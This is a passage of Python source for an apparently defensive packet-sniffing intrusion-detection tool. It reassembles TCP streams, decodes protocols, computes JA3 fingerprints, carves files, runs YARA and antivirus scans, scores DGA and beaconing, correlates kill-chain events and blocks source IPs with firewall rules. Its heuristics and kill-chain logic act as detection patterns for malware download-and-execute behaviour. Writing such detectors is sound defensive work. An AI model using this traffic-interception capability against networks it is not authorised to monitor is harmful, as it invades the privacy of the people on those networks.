if overlap >= len(payload):
return 0
payload = payload[overlap:]
seq = self.next_seq
if seq == self.next_seq:
self.contiguous.extend(payload)
appended += len(payload)
self.next_seq += len(payload)
while self.next_seq in self.out_of_order:
chunk = self.out_of_order.pop(self.next_seq)
self.contiguous.extend(chunk)
appended += len(chunk)
self.next_seq += len(chunk)
return appended
existing = self.out_of_order.get(seq)
if existing is None or len(payload) > len(existing):
self.out_of_order[seq] = payload
return 0
@dataclass
class StreamState:
client_to_server: StreamDirectionState = field(default_factory=StreamDirectionState)
server_to_client: StreamDirectionState = field(default_factory=StreamDirectionState)
created_at: float = field(default_factory=time.time)
last_seen: float = field(default_factory=time.time)
class TCPStreamReassembler:
def __init__(self, logger: Optional[logging.Logger] = None, max_streams: int = 10000, stream_ttl: int = 1800) -> None:
self.logger = logger or logging.getLogger(__name__)
self.max_streams = max_streams
self.stream_ttl = stream_ttl
self.streams: Dict[FlowKey, StreamState] = {}
def _evict_old(self) -> None:
now = time.time()
stale_keys = [k for k, v in self.streams.items() if now - v.last_seen > self.stream_ttl]
for key in stale_keys:
self.streams.pop(key, None)
if len(self.streams) > self.max_streams:
for key, _ in sorted(self.streams.items(), key=lambda item: item[1].last_seen)[:len(self.streams) - self.max_streams]:
self.streams.pop(key, None)
def add_tcp_segment(self, src_ip: str, src_port: int, dst_ip: str, dst_port: int, seq: int, payload: bytes) -> Dict[str, Any]:
key, forward_is_client = canonical_flow_key(src_ip, src_port, dst_ip, dst_port)
stream = self.streams.setdefault(key, StreamState())
stream.last_seen = time.time()
state = stream.client_to_server if forward_is_client else stream.server_to_client
added = state.add(seq, payload)
self._evict_old()
return {
"flow_key": key,
"is_client_to_server": forward_is_client,
"bytes_added": added,
"client_stream": bytes(stream.client_to_server.contiguous),
"server_stream": bytes(stream.server_to_client.contiguous),
}
class ProtocolDecoder:
def __init__(self, logger: Optional[logging.Logger] = None) -> None:
self.logger = logger or logging.getLogger(__name__)
def decode_http(self, payload: bytes, direction: str) -> Dict[str, Any]:
text = payload.decode("iso-8859-1", errors="replace")
head, _, body = text.partition("\r\n\r\n")
lines = head.split("\r\n") if head else []
headers: Dict[str, str] = {}
for line in lines[1:]:
if ":" in line:
k, v = line.split(":", 1)
headers[k.strip().lower()] = v.strip()
normalized = {
"protocol": "http1",
"direction": direction,
"start_line": lines[0] if lines else "",
"headers": headers,
"body_bytes": body.encode("iso-8859-1", errors="ignore"),
"host": headers.get("host", ""),
"content_type": headers.get("content-type", ""),
"transfer_encoding": headers.get("transfer-encoding", "").lower(),
"content_encoding": headers.get("content-encoding", "").lower(),
}
return normalized
def decode_dns(self, payload: bytes) -> Dict[str, Any]:
if len(payload) < 12:
return {"protocol": "dns", "error": "short_payload"}
tid, flags, qdcount, ancount, nscount, arcount = struct.unpack("!HHHHHH", payload[:12])
qr = (flags >> 15) & 0x1
opcode = (flags >> 11) & 0xF
rcode = flags & 0xF
query_name = ""
if qdcount > 0:
try:
query_name, _ = DNSParser(logger=self.logger).parse_dns_name(payload, 12)
except Exception:
query_name = ""
return {
"protocol": "dns",
"transaction_id": tid,
"is_response": bool(qr),
"opcode": opcode,
"rcode": rcode,
"qdcount": qdcount,
"ancount": ancount,
"nscount": nscount,
"arcount": arcount,
"query": query_name,
}
def _parse_tls_client_hello(self, payload: bytes) -> Dict[str, Any]:
if len(payload) < 5 or payload[0] != 0x16:
return {}
rec_len = int.from_bytes(payload[3:5], "big")
rec = payload[5:5 + rec_len]
if len(rec) < 4 or rec[0] != 0x01:
return {}
hs_len = int.from_bytes(rec[1:4], "big")
body = rec[4:4 + hs_len]
if len(body) < 34:
return {}
idx = 34
if idx >= len(body):
return {}
sess_len = body[idx]
idx += 1 + sess_len
if idx + 2 > len(body):
return {}
ciphers_len = int.from_bytes(body[idx:idx + 2], "big")
idx += 2
ciphers_raw = body[idx:idx + ciphers_len]
idx += ciphers_len
if idx >= len(body):
return {}
comp_len = body[idx]
idx += 1 + comp_len
exts: List[int] = []
curves: List[int] = []
ec_pf: List[int] = []
sni = ""
if idx + 2 <= len(body):
ext_total = int.from_bytes(body[idx:idx + 2], "big")
idx += 2
end = min(len(body), idx + ext_total)
while idx + 4 <= end:
etype = int.from_bytes(body[idx:idx + 2], "big")
elen = int.from_bytes(body[idx + 2:idx + 4], "big")
idx += 4
eval_data = body[idx:idx + elen]
idx += elen
exts.append(etype)
if etype == 0 and len(eval_data) >= 5:
list_len = int.from_bytes(eval_data[0:2], "big")
if 2 + list_len <= len(eval_data) and eval_data[2] == 0:
name_len = int.from_bytes(eval_data[3:5], "big")
if 5 + name_len <= len(eval_data):
sni = eval_data[5:5 + name_len].decode("utf-8", errors="replace")
elif etype == 10 and len(eval_data) >= 2:
glen = int.from_bytes(eval_data[0:2], "big")
data = eval_data[2:2 + glen]
curves = [int.from_bytes(data[i:i + 2], "big") for i in range(0, len(data), 2) if i + 2 <= len(data)]
elif etype == 11 and len(eval_data) >= 1:
flen = eval_data[0]
data = eval_data[1:1 + flen]
ec_pf = [b for b in data]
ciphers = [int.from_bytes(ciphers_raw[i:i + 2], "big") for i in range(0, len(ciphers_raw), 2) if i + 2 <= len(ciphers_raw)]
ja3_string = ",".join([
"771",
"-".join(str(c) for c in ciphers),
"-".join(str(e) for e in exts),
"-".join(str(c) for c in curves),
"-".join(str(p) for p in ec_pf),
])
ja3_hash = hashlib.md5(ja3_string.encode("utf-8", errors="ignore")).hexdigest()
return {
"protocol": "tls",
"record_type": "handshake",
"sni": sni,
"ja3": ja3_string,
"ja3_hash": ja3_hash,
}
def decode_smtp(self, payload: bytes) -> Dict[str, Any]:
text = payload.decode("utf-8", errors="replace")
lines = [line.strip() for line in text.splitlines() if line.strip()]
commands = [line.split(" ", 1)[0].upper() for line in lines[:25]]
return {"protocol": "smtp", "commands": commands, "line_count": len(lines)}
def decode_smb(self, payload: bytes) -> Dict[str, Any]:
if len(payload) >= 4 and payload[:4] in (b"\xfeSMB", b"\xffSMB"):
return {"protocol": "smb", "signature": payload[:4].hex(), "command": payload[4] if len(payload) > 4 else None}
return {"protocol": "smb", "error": "not_smb"}
def decode_by_ports_or_signature(self, src_port: int, dst_port: int, payload: bytes, direction: str) -> Dict[str, Any]:
ports = {src_port, dst_port}
if not payload:
return {"protocol": "unknown"}
if 53 in ports:
return self.decode_dns(payload)
if payload.startswith((b"GET ", b"POST ", b"PUT ", b"DELETE ", b"HEAD ", b"OPTIONS ", b"HTTP/1.")) or 80 in ports or 8080 in ports:
return self.decode_http(payload, direction)
if payload[:1] == b"\x16" or 443 in ports:
tls_data = self._parse_tls_client_hello(payload)
return tls_data if tls_data else {"protocol": "tls", "record_type": "unknown"}
if 25 in ports or payload[:5].upper() in (b"HELO ", b"EHLO ", b"MAIL ", b"RCPT ", b"DATA\r"):
return self.decode_smtp(payload)
if 445 in ports or payload.startswith((b"\xfeSMB", b"\xffSMB")):
return self.decode_smb(payload)
return {"protocol": "unknown"}
class ContentDecoder:
def __init__(self, logger: Optional[logging.Logger] = None) -> None:
self.logger = logger or logging.getLogger(__name__)
def decode_chunked(self, body: bytes) -> bytes:
out = bytearray()
idx = 0
while idx < len(body):
end = body.find(b"\r\n", idx)
if end == -1:
break
size_line = body[idx:end].split(b";", 1)[0].strip()
try:
size = int(size_line, 16)
except ValueError:
break
idx = end + 2
if size == 0:
break
out.extend(body[idx:idx + size])
idx += size + 2
return bytes(out)
def decode_http_content(self, decoded_http: Dict[str, Any]) -> bytes:
body = decoded_http.get("body_bytes", b"")
if decoded_http.get("transfer_encoding") == "chunked":
body = self.decode_chunked(body)
content_encoding = decoded_http.get("content_encoding", "")
try:
if "gzip" in content_encoding:
body = gzip.decompress(body)
elif "deflate" in content_encoding:
body = zlib.decompress(body)
except Exception as exc:
self.logger.debug("Content decoding failed: %s", exc)
return body
def try_base64(self, payload: bytes) -> bytes:
cleaned = b"".join(payload.split())
if len(cleaned) < 16:
return b""
if not re.fullmatch(rb"[A-Za-z0-9+/=]+", cleaned):
return b""
try:
return binascii.a2b_base64(cleaned)
except Exception:
return b""
def detect_container(self, payload: bytes) -> str:
if payload.startswith(b"PK\x03\x04"):
return "zip"
if payload.startswith(b"%PDF-"):
return "pdf"
if payload.startswith(b"MZ"):
return "pe"
if payload.startswith(bytes.fromhex("D0CF11E0A1B11AE1")):
return "ole"
return "unknown"
class FileObjectCarver:
def __init__(self, logger: Optional[logging.Logger] = None, output_dir: str = "carved_objects") -> None:
self.logger = logger or logging.getLogger(__name__)
self.output_dir = output_dir
os.makedirs(self.output_dir, exist_ok=True)
def carve(self, flow_key: FlowKey, payload: bytes, source: str) -> Optional[Dict[str, Any]]:
container = ContentDecoder(logger=self.logger).detect_container(payload)
if container == "unknown" or len(payload) < 64:
return None
timestamp = datetime.now(timezone.utc).strftime("%Y%m%dT%H%M%S%f")
filename = f"{flow_key.src_ip}_{flow_key.src_port}_{flow_key.dst_ip}_{flow_key.dst_port}_{source}_{timestamp}.{container}"
safe_name = re.sub(r"[^A-Za-z0-9_.-]", "_", filename)
path = os.path.join(self.output_dir, safe_name)
with open(path, "wb") as f:
f.write(payload)
sha256 = hashlib.sha256(payload).hexdigest()
return {"path": path, "sha256": sha256, "container": container, "size": len(payload)}
class SignatureScanner:
def __init__(self, logger: Optional[logging.Logger] = None, yara_rules_path: str = "") -> None:
self.logger = logger or logging.getLogger(__name__)
self.yara_rules_path = yara_rules_path
self.yara_rules = None
if yara is not None and yara_rules_path and os.path.exists(yara_rules_path):
try:
self.yara_rules = yara.compile(filepath=yara_rules_path)
self.logger.info("YARA rules loaded: %s", yara_rules_path)
except Exception as exc:
self.logger.warning("Failed to load YARA rules: %s", exc)
def scan_bytes(self, payload: bytes) -> List[str]:
if self.yara_rules is None:
return []
try:
matches = self.yara_rules.match(data=payload)
return [m.rule for m in matches]
except Exception as exc:
self.logger.debug("YARA byte scan failed: %s", exc)
return []
def scan_file(self, path: str) -> Dict[str, Any]:
result = {"yara": [], "av": "not_run"}
if self.yara_rules is not None:
try:
result["yara"] = [m.rule for m in self.yara_rules.match(path)]
except Exception as exc:
self.logger.debug("YARA file scan failed for %s: %s", path, exc)
av_cmd = None
if shutil.which("clamscan"):
av_cmd = ["clamscan", "--no-summary", path]
elif shutil.which("MpCmdRun.exe"):
av_cmd = ["MpCmdRun.exe", "-Scan", "-ScanType", "3", "-File", path]
if av_cmd:
try:
proc = subprocess.run(av_cmd, capture_output=True, text=True, timeout=30)
output = (proc.stdout or "") + "\n" + (proc.stderr or "")
result["av"] = output.strip()[:1000]
except Exception as exc:
result["av"] = f"scan_failed: {exc}"
return result
class HeuristicDetector:
def __init__(self, logger: Optional[logging.Logger] = None) -> None:
self.logger = logger or logging.getLogger(__name__)
self.conn_history: Dict[str, deque] = defaultdict(lambda: deque(maxlen=128))
self.dns_history: Dict[str, deque] = defaultdict(lambda: deque(maxlen=128))
@staticmethod
def entropy(payload: bytes) -> float:
if not payload:
return 0.0
counts = Counter(payload)
total = len(payload)
return -sum((c / total) * np.log2(c / total) for c in counts.values() if c > 0) if np is not None else 0.0
def score_dga_like(self, domain: str) -> float:
if not domain:
return 0.0
label = domain.split(".")[0].lower()
if len(label) < 12:
return 0.0
consonants = sum(ch in "bcdfghjklmnpqrstvwxyz" for ch in label)
vowels = sum(ch in "aeiou" for ch in label)
digit_ratio = sum(ch.isdigit() for ch in label) / max(len(label), 1)
weird_ratio = sum(ch not in string.ascii_lowercase + string.digits + "-" for ch in label) / max(len(label), 1)
imbalance = abs(consonants - vowels) / max(len(label), 1)
return min(1.0, digit_ratio * 0.6 + weird_ratio * 0.8 + imbalance)
def track_connect(self, src_ip: str, dst_ip: str) -> float:
now = time.time()
history = self.conn_history[src_ip]
history.append((now, dst_ip))
recent = [entry for entry in history if now - entry[0] <= 60]
unique_targets = len({entry[1] for entry in recent})
return min(1.0, unique_targets / 40.0)
def track_dns(self, src_ip: str, domain: str) -> float:
now = time.time()
history = self.dns_history[src_ip]
history.append((now, domain))
recent = [entry for entry in history if now - entry[0] <= 60]
return min(1.0, len(recent) / 80.0)
class SessionCorrelator:
def __init__(self, logger: Optional[logging.Logger] = None) -> None:
self.logger = logger or logging.getLogger(__name__)
self.events: Dict[str, deque] = defaultdict(lambda: deque(maxlen=256))
def add_event(self, host: str, kind: str, details: Dict[str, Any]) -> None:
self.events[host].append({"ts": time.time(), "kind": kind, "details": details})
def detect_kill_chain(self, host: str) -> bool:
ev = list(self.events.get(host, []))
if len(ev) < 3:
return False
kinds = [e["kind"] for e in ev[-20:]]
def idx(name: str) -> int:
try:
return kinds.index(name)
except ValueError:
return -1
i_dns = idx("dns_query")
i_conn = idx("connect")
i_download = idx("download")
i_exec = idx("execute")
return -1 not in (i_dns, i_conn, i_download, i_exec) and i_dns < i_conn < i_download < i_exec
class MLClassifier:
"""Line-rate fast-path classifier on rich byte/token features.
Loads a v2 bundle ({"model", "feature_names", "version"}) produced by
train_ml_model(), or a bare estimator for backward compatibility. When no
model is available it falls back to a token/magic/entropy heuristic that is
far less false-positive-prone than the old length+entropy rule.
"""
def __init__(self, model_path: str = "model.pkl", logger: Optional[logging.Logger] = None) -> None:
self.logger = logger or logging.getLogger(__name__)
self.model = None
self.feature_names = FEATURE_NAMES
try:
import joblib
bundle = joblib.load(model_path)
if isinstance(bundle, dict) and "model" in bundle:
self.model = bundle["model"]
self.feature_names = bundle.get("feature_names", self.feature_names)
self.logger.info("ML model v%s loaded from %s (%d features)",
bundle.get("version", "?"), model_path,
len(self.feature_names or []))
else:
self.model = bundle # legacy bare estimator
self.logger.info("Legacy ML model loaded from %s", model_path)
except Exception as e:
self.logger.error("Failed to load ML model from %s: %s (using heuristic fallback)",
model_path, e)
def extract_features(self, payload: bytes) -> "np.ndarray":
return np.array([compute_feature_vector(payload)], dtype=float)
def _heuristic(self, payload: bytes) -> bool:
low = payload.lower()
for tok, _name in ATTACK_TOKENS:
if tok in low and tok not in (b";", b"|", b"--", b"select "):
return True
if payload[:2] == b"MZ" or payload[:4] in (b"\xfeSMB", b"\xffSMB"):
return True
if len(payload) > 2000 and shannon_entropy(payload[:4096]) > 7.3:
return True
return False
def classify(self, payload: bytes) -> bool:
if self.model is not None:
try:
features = self.extract_features(payload)
prediction = self.model.predict(features)
self.logger.debug("ML model prediction: %s", prediction)
return bool(prediction[0])
except Exception as exc:
self.logger.debug("ML predict failed (%s); using heuristic.", exc)
return self._heuristic(payload)
@staticmethod
def train_model(dataset_path: str, model_output_path: str, logger: Optional[logging.Logger] = None) -> None:
train_ml_model(model_output_path=model_output_path, csv_path=dataset_path, logger=logger)
def get_local_process_info(port: int) -> str:
try:
import psutil
for conn in psutil.net_connections(kind="inet"):
if conn.laddr and conn.laddr.port == port:
return str(conn.pid) if conn.pid is not None else "N/A"
except ImportError:
return "N/A (psutil not installed)"
return "N/A"
class XDPCollector:
def __init__(self, interface: str, logger: Optional[logging.Logger] = None) -> None:
if BPF is None:
raise ImportError("BCC BPF module is not available. Please install bcc.")
self.logger = logger or logging.getLogger(__name__)
self.interface = interface
self.bpf = BPF(text=self._bpf_program())
func = self.bpf.load_func("xdp_prog", BPF.XDP)
self.bpf.attach_xdp(self.interface, func, 0)
self.logger.info("XDP program attached on interface %s", self.interface)
self.bpf["events"].open_perf_buffer(self._handle_event)
def _bpf_program(self) -> str:
return """
#include <uapi/linux/bpf.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
struct data_t {
u32 pkt_len;
u32 src_ip;
u32 dst_ip;
u8 protocol;
};
BPF_PERF_OUTPUT(events);
int xdp_prog(struct xdp_md *ctx) {
struct data_t data = {};
void *data_end = (void *)(long)ctx->data_end;
void *data_ptr = (void *)(long)ctx->data;
struct ethhdr *eth = data_ptr;
if (data_ptr + sizeof(*eth) > data_end)
return XDP_PASS;
if (eth->h_proto == __constant_htons(ETH_P_IP)) {
struct iphdr *ip = data_ptr + sizeof(*eth);
if ((void*)ip + sizeof(*ip) > data_end)
return XDP_PASS;
data.pkt_len = data_end - data_ptr;
data.src_ip = ip->saddr;
data.dst_ip = ip->daddr;
data.protocol = ip->protocol;
events.perf_submit(ctx, &data, sizeof(data));
}
return XDP_PASS;
}
"""
def _handle_event(self, cpu, data, size):
global last_xdp_metadata
event = self.bpf["events"].event(data)
last_xdp_metadata = {
"pkt_len": event.pkt_len,
"src_ip": event.src_ip,
"dst_ip": event.dst_ip,
"protocol": event.protocol
}
self.logger.debug("XDP event: %s", last_xdp_metadata)
def poll(self):
self.bpf.perf_buffer_poll(timeout=100)
def detach(self):
self.bpf.remove_xdp(self.interface, 0)
def get_xdp_metadata_details() -> str:
global last_xdp_metadata
if last_xdp_metadata:
return (f"XDP Metadata: Packet Length: {last_xdp_metadata.get('pkt_len')}, "
f"Src IP: {last_xdp_metadata.get('src_ip')}, "
f"Dst IP: {last_xdp_metadata.get('dst_ip')}, "
f"Protocol: {last_xdp_metadata.get('protocol')}")
else:
return "No XDP metadata available."
class PacketSniffer:
COMMON_PORTS = {
20: ("FTP Data", "File Transfer Protocol - Data channel"),
21: ("FTP Control", "File Transfer Protocol - Control channel"),
22: ("SSH", "Secure Shell"),
23: ("Telnet", "Telnet protocol"),
25: ("SMTP", "Simple Mail Transfer Protocol"),
53: ("DNS", "Domain Name System"),
67: ("DHCP", "DHCP Server"),
68: ("DHCP", "DHCP Client"),
80: ("HTTP", "Hypertext Transfer Protocol"),
110: ("POP3", "Post Office Protocol"),
119: ("NNTP", "Network News Transfer Protocol"),
123: ("NTP", "Network Time Protocol"),
143: ("IMAP", "Internet Message Access Protocol"),
161: ("SNMP", "Simple Network Management Protocol"),
443: ("HTTPS", "HTTP Secure"),
3306: ("MySQL", "MySQL database service"),
5432: ("PostgreSQL", "PostgreSQL database service"),
3389: ("RDP", "Remote Desktop Protocol")
}
def __init__(self, args: argparse.Namespace) -> None:
self.args = args
self.logger = logging.getLogger("PacketSniffer")
self.flagged_logger = logging.getLogger("FlaggedIPLogger")
self.dns_logger = logging.getLogger("DNSQueryLogger")
self.ip_lookup = IPLookup(ttl=3600, logger=self.logger)
self.dns_parser = DNSParser(logger=self.logger)
self.payload_parser = PayloadParser(logger=self.logger)
self.protocol_decoder = ProtocolDecoder(logger=self.logger)
self.content_decoder = ContentDecoder(logger=self.logger)
self.file_carver = FileObjectCarver(logger=self.logger, output_dir=getattr(self.args, "carve_dir", "carved_objects"))
self.signature_scanner = SignatureScanner(logger=self.logger, yara_rules_path=getattr(self.args, "yara_rules", ""))
self.heuristics = HeuristicDetector(logger=self.logger)
self.correlator = SessionCorrelator(logger=self.logger)
self.reassembler = TCPStreamReassembler(logger=self.logger)
self.async_runner = AsyncRunner()
self._blocked_ips: set = set()
self.llm_labeler = None
self._llm_queue: Optional[queue.Queue] = None
self._llm_dropped = 0
if getattr(self.args, "expensive", False):
self.llm_labeler = get_llm_labeler(self.args, logger=self.logger)
if self.llm_labeler is not None:
self.logger.info("Warming up local LLM (downloads/caches on first run)...")
self.llm_labeler.warmup()
# Non-blocking analysis: the capture callback enqueues work and the
# worker thread runs the (slow) LLM so packet capture never stalls.
self._llm_queue = queue.Queue(maxsize=256)
self._llm_worker_thread = threading.Thread(target=self._llm_worker_loop, daemon=True)
self._llm_worker_thread.start()
if self.args.sentry:
self.ml_classifier = MLClassifier(model_path=self.args.model_path, logger=self.logger)
self.xdp_collector = None
if self.args.xdp and BPF is not None:
try:
self.xdp_collector = XDPCollector(self.args.interface, logger=self.logger)
self.xdp_thread = threading.Thread(target=self._poll_xdp, daemon=True)
self.xdp_thread.start()
except Exception as e:
self.logger.exception("Failed to initialize XDPCollector: %s", e)
def _risk_from_signals(self, signature_hits: List[str], heuristic_score: float, ml_flag: bool) -> float:
score = 0.0
score += min(0.6, 0.2 * len(signature_hits))
score += min(0.3, heuristic_score * 0.3)
if ml_flag:
score += 0.3
return min(1.0, score)
def _emit_session_events(self, src_ip: str, dst_ip: str, decoded: Dict[str, Any], carved: Optional[Dict[str, Any]]) -> None:
protocol = decoded.get("protocol", "unknown")
self.correlator.add_event(src_ip, "connect", {"dst_ip": dst_ip, "protocol": protocol})
if protocol == "dns" and decoded.get("query"):
self.correlator.add_event(src_ip, "dns_query", {"query": decoded.get("query")})
if carved is not None:
self.correlator.add_event(src_ip, "download", {"sha256": carved.get("sha256"), "path": carved.get("path")})
if carved.get("container") in ("pe",):
self.correlator.add_event(src_ip, "execute", {"container": carved.get("container")})
def _analyze_reassembled_tcp(self, src_ip: str, src_port: int, dst_ip: str, dst_port: int, tcp_seq: int, payload: bytes) -> None:
if not payload:
return
reassembled = self.reassembler.add_tcp_segment(src_ip, src_port, dst_ip, dst_port, tcp_seq, payload)
if reassembled.get("bytes_added", 0) == 0:
return
flow_key: FlowKey = reassembled["flow_key"]
direction = "c2s" if reassembled.get("is_client_to_server") else "s2c"
stream_payload = reassembled["client_stream"] if direction == "c2s" else reassembled["server_stream"]
tail = stream_payload[-65536:]
decoded = self.protocol_decoder.decode_by_ports_or_signature(src_port, dst_port, tail, direction)
protocol = decoded.get("protocol", "unknown")
signature_hits: List[str] = []
candidate_payload = tail
if protocol == "http1":
candidate_payload = self.content_decoder.decode_http_content(decoded)
else:
b64 = self.content_decoder.try_base64(tail)
if b64:
candidate_payload = b64
signature_hits.extend(self.signature_scanner.scan_bytes(candidate_payload))
carved = self.file_carver.carve(flow_key, candidate_payload, source=direction)
file_scan: Dict[str, Any] = {"yara": [], "av": "not_run"}
if carved is not None:
file_scan = self.signature_scanner.scan_file(carved["path"])
signature_hits.extend(file_scan.get("yara", []))
entropy_score = 1.0 if self.heuristics.entropy(candidate_payload[:4096]) >= 7.3 else 0.0
dga_score = 0.0
if protocol == "dns":
dga_score = self.heuristics.score_dga_like(decoded.get("query", ""))
beacon_score = self.heuristics.track_connect(src_ip, dst_ip)
if protocol == "dns":
_ = self.heuristics.track_dns(src_ip, decoded.get("query", ""))
heuristic_score = min(1.0, max(entropy_score, dga_score, beacon_score))
ml_flag = False
if self.args.sentry:
ml_flag = self.ml_classifier.classify(candidate_payload)
risk = self._risk_from_signals(signature_hits, heuristic_score, ml_flag)
self._emit_session_events(src_ip, dst_ip, decoded, carved)
kill_chain = self.correlator.detect_kill_chain(src_ip)
tls_meta = {}
if protocol == "tls":
tls_meta = {
"sni": decoded.get("sni", ""),
"ja3": decoded.get("ja3", ""),
"ja3_hash": decoded.get("ja3_hash", ""),
}
if risk >= 0.7 or kill_chain:
message = (
"\n====== ADVANCED DETECTION ALERT ======\n"
f"Flow: {src_ip}:{src_port} -> {dst_ip}:{dst_port}\n"
f"Protocol: {protocol}\n"
f"Risk Score: {risk:.2f}\n"
f"Signatures: {signature_hits}\n"
f"Heuristic Score: {heuristic_score:.2f}\n"
f"ML Flag: {ml_flag}\n"
f"TLS Metadata: {tls_meta}\n"
f"Carved Object: {carved}\n"
f"File Scan: {file_scan}\n"
f"Kill Chain Detected: {kill_chain}\n"
"======================================\n"
)
self.flagged_logger.warning(message)
if self.args.sentry:
self.block_ip(src_ip)
def _poll_xdp(self):
while True:
try:
if self.xdp_collector:
self.xdp_collector.poll()
except Exception as e:
self.logger.exception("Error polling XDP events: %s", e)
def _llm_worker_loop(self) -> None:
"""Background consumer for --expensive mode: runs the slow LLM off the
capture thread so packet capture is never blocked."""
while True:
job = self._llm_queue.get()
try:
self._process_llm_job(job)
except Exception as exc:
self.logger.exception("LLM worker error: %s", exc)
finally:
self._llm_queue.task_done()
def _process_llm_job(self, job: Dict[str, Any]) -> None:
src_ip = job["src"]
label, details = classify_packet_llm(
self.llm_labeler, self.args.llm_backend,
summary=job["summary"], normalized_payload=job["normalized"],
hex_payload=job["hex"], packet_details=job["details"],
protocol=job["protocol"], src=src_ip, dst=job["dst"],
entropy=job["entropy"], logger=self.logger,
)
if label == 1:
self.logger.warning("Expensive Mode: %s -> MALICIOUS (%s, conf=%.2f): %s",
src_ip, details.get("category", "?"),
details.get("confidence", 0.0), details.get("reason", ""))
self.log_flagged_ip(job["packet"], flagged_signatures=[], app_name="Expensive Mode",
app_details=f"LLM:{details.get('category','malicious')}")
self.block_ip(src_ip)
else:
self.logger.info("Expensive Mode: %s -> benign (%s)",
src_ip, details.get("reason", ""))
def identify_application(self, src_port: int, dst_port: int) -> Tuple[str, str]:
for port in (dst_port, src_port):
if port in self.COMMON_PORTS:
return self.COMMON_PORTS[port]
return ("Unknown", "Unknown application protocol")
def block_ip(self, ip: str) -> None:
"""Block an IP via the host firewall.
Validates the address (preventing command injection from spoofed
source IPs), deduplicates, and records it to ``blocked_ips.log``. Real
firewall rules are only applied when ``--enforce`` is set; otherwise the
action is a safe dry-run so the operator can review before enforcing.
"""
try:
ipaddress.ip_address(ip)
except ValueError:
self.logger.warning("Refusing to block invalid IP: %r", ip)
return
if ip in self._blocked_ips:
return
self._blocked_ips.add(ip)
with open("blocked_ips.log", "a", encoding="utf-8") as fh:
fh.write(f"{datetime.now(timezone.utc).isoformat()} {ip}\n")
if not getattr(self.args, "enforce", False):
self.logger.warning("[DRY-RUN] Would block IP %s "
"(pass --enforce to apply a firewall rule).", ip)
return
system = detect_operating_system()
try:
if system == "windows":
rule = f"PacketSniffer block {ip}"
cmd = ["netsh", "advfirewall", "firewall", "add", "rule",
f"name={rule}", "dir=in", "action=block", f"remoteip={ip}"]
elif system in ("linux", "macos"):
cmd = ["iptables", "-A", "INPUT", "-s", ip, "-j", "DROP"]
else:
self.logger.error("No firewall backend for platform %s", system)
return
proc = subprocess.run(cmd, capture_output=True, text=True, timeout=15)
if proc.returncode == 0:
self.logger.warning("ENFORCED firewall block on %s", ip)
else:
self.logger.error("Firewall block of %s failed (rc=%s): %s",
ip, proc.returncode, (proc.stderr or "").strip()[:200])
except Exception as exc:
self.logger.exception("Error applying firewall block for %s: %s", ip, exc)
def _is_noisy_discovery_traffic(self, packet) -> bool:
if not packet.haslayer(IP):
return False
src_ip = packet[IP].src
dst_ip = packet[IP].dst
try:
src_obj = ipaddress.ip_address(src_ip)
dst_obj = ipaddress.ip_address(dst_ip)
except ValueError:
return False
if not packet.haslayer(UDP):
return False
return src_obj.is_private and (dst_obj.is_multicast or dst_ip == "255.255.255.255")
def log_flagged_ip(self, packet, flagged_signatures: List[Tuple[str, str]],
app_name: str, app_details: str) -> None:
source_ip = "Unknown"
dest_ip = "Unknown"
port_info = ""
process_id = "N/A"
if packet.haslayer(IP):
source_ip = packet[IP].src
dest_ip = packet[IP].dst
elif packet.haslayer(IPv6):
source_ip = packet[IPv6].src
dest_ip = packet[IPv6].dst
if packet.haslayer(TCP):
tcp_layer = packet[TCP]
port_info = f"TCP src: {tcp_layer.sport}, dst: {tcp_layer.dport}"
process_id = get_local_process_info(tcp_layer.dport)
elif packet.haslayer(UDP):
udp_layer = packet[UDP]
port_info = f"UDP src: {udp_layer.sport}, dst: {udp_layer.dport}"
process_id = get_local_process_info(udp_layer.dport)
ip_background = "No background info available."
future = self.async_runner.run_coroutine(self.ip_lookup.get_ip_info(source_ip))
try:
info = future.result(timeout=6)
if info:
ip_background = "\n".join([f"{k.capitalize()}: {v}" for k, v in info.items() if k in ("hostname", "city", "region", "country", "org")])
except Exception as e:
self.logger.exception("Error retrieving IP background info: %s", e)
message = (
"\n====== FLAGGED IP ALERT ======\n"
f"Source IP: {source_ip}\n"
f"Destination IP: {dest_ip}\n"
f"Application: {app_name} ({app_details})\n"
f"Port Info: {port_info}\n"
f"Process ID: {process_id}\n"
f"IP Background:\n{ip_background}\n"
f"Flagged Signatures: {flagged_signatures}\n"
"===============================\n"
)
self.flagged_logger.warning(message)
def parse_payload(self, packet, app_name: str, payload: bytes) -> None:
if self.args.sentry:
if self.ml_classifier.classify(payload):
src_ip = packet[IP].src if packet.haslayer(IP) else "unknown"
self.logger.warning("Sentry mode: payload classified as malicious. Blocking IP %s", src_ip)
self.block_ip(src_ip)
return
self.logger.info("Parsing payload for application: %s", app_name)
flagged_signatures = self.payload_parser.analyze_hex_dump(payload)
if flagged_signatures and not self._is_noisy_discovery_traffic(packet):
app_info = self.identify_application(
packet[TCP].sport if packet.haslayer(TCP) else (packet[UDP].sport if packet.haslayer(UDP) else 0),
packet[TCP].dport if packet.haslayer(TCP) else (packet[UDP].dport if packet.haslayer(UDP) else 0)
)
self.log_flagged_ip(packet, flagged_signatures, app_name, app_info[1])
if app_name == "HTTP":
self.payload_parser.parse_http_payload(payload)
elif app_name == "HTTPS":
self.payload_parser.parse_tls_payload(payload[:64])
elif app_name == "DNS":
self.dns_parser.parse_dns_payload(payload)
else:
self.payload_parser.parse_text_payload(payload)
def packet_handler(self, packet) -> None:
if self.args.expensive and packet.haslayer(Raw):
payload = bytes(packet[Raw].load)
normalized_payload = self.payload_parser.normalize_payload(payload)
hex_payload = payload.hex()
packet_summary = packet.summary()
protocol = ""
if packet.haslayer(TCP):
protocol = self.identify_application(packet[TCP].sport, packet[TCP].dport)[0]
elif packet.haslayer(UDP):
protocol = self.identify_application(packet[UDP].sport, packet[UDP].dport)[0]
src_ip = packet[IP].src if packet.haslayer(IP) else "unknown"
dst_ip = packet[IP].dst if packet.haslayer(IP) else "unknown"
entropy = self.heuristics.entropy(payload[:4096])
# Only the OpenAI path needs the costly scapy dump; the local path
# uses compact structured fields instead.
packet_details = packet.show(dump=True) if self.args.llm_backend == "openai" else ""
job = {
"packet": packet, "summary": packet_summary, "normalized": normalized_payload,
"hex": hex_payload, "details": packet_details, "protocol": protocol,
"src": src_ip, "dst": dst_ip, "entropy": entropy,
}
# Enqueue without blocking the capture loop; drop (and count) if the
# analyzer is saturated rather than stalling capture.
try:
self._llm_queue.put_nowait(job)
except queue.Full:
self._llm_dropped += 1
if self._llm_dropped % 50 == 1:
self.logger.warning("LLM analysis queue full; dropped %d packets so far "
